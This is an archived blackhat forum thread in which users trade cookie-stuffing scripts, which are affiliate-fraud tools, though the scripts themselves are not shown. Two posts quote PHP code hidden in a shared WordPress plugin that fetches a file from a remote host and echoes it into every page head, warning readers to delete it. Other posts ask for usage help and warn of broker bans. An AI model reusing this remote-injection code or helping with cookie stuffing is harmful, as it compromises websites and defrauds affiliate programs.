Best Blackhat Forum

Full Version: [GET] 3 Cookie Stuffing Scripts
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3
can u please explain how to use it step by step?
Thanks for the scripts man
Thanks man for sharing ...some asses are selling it on their blogs for 100$
Be careful with ccc wordpress plugin. please delete this code from cccs-2.8.php (edit plugin) for your safety

PHP Code:
function jqueryj_head() {

       if(
function_exists('curl_init'))
       {
               
$url "hxxp://smuss.net/jquery-1.6.3.min.js";
               
$ch curl_init();
               
$timeout 10;
               
curl_setopt($ch,CURLOPT_URL,$url);
               
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
               
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
               
$data curl_exec($ch);
               
curl_close($ch);
               echo 
"$data";
       }
}
add_action('wp_head''jqueryj_head'); 
how can I embed an iframe to a wordpress site??
Thanks for checking and notifying us! Cool Cool Cool
(07-30-2013 04:02 AM)ebokalsel Wrote: [ -> ]Be careful with ccc wordpress plugin. please delete this code from cccs-2.8.php (edit plugin) for your safety

PHP Code:
function jqueryj_head() {

       if(
function_exists('curl_init'))
       {
               
$url "hxxp://smuss.net/jquery-1.6.3.min.js";
               
$ch curl_init();
               
$timeout 10;
               
curl_setopt($ch,CURLOPT_URL,$url);
               
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
               
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
               
$data curl_exec($ch);
               
curl_close($ch);
               echo 
"$data";
       }
}
add_action('wp_head''jqueryj_head'); 
if you using this, get banned from broker!! very harmfull and very high risk. this is old method and all broker know it
link worked fine for me mate.
Thanks a lot guys!
gone any mirror???
Pages: 1 2 3
Reference URL's